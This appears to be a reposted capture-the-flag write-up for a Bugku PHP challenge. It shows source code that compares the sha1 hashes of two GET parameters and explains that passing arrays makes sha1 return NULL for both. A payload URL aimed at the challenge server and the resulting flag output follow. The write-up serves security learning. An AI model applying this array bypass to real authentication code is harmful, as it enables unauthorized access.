<?
php
$flag = "flag"
;
if (
isset(
$_GET['name']) and
isset(
$_GET['password'
]))
{
var_dump(
$_GET['name'
]);
echo "
"
;
var_dump(
$_GET['password'
]);
var_dump(
sha1(
$_GET['name'
]));
var_dump(
sha1(
$_GET['password'
]));
if (
$_GET['name'] ==
$_GET['password'
])
echo '
Your password can not be your name!
'
;
else if (
sha1(
$_GET['name']) ===
sha1(
$_GET['password'
]))
die('Flag: '.
$flag);
else
echo '
Invalid password.
'
;
}
else
echo '
Login first!
'
;
?>
sha跟md5函数一样,可以用数组绕过
payload
http:
//123.206.87.240:9009/7.php?name[]=1&password[]=2
得到
array(1) { [0]=> string(1) "1" } array(1) { [0]=> string(1) "2" } NULL NULL Flag: flag{bugku--daimasj-a2}
转载于:https://www.cnblogs.com/gaonuoqi/p/11407477.html
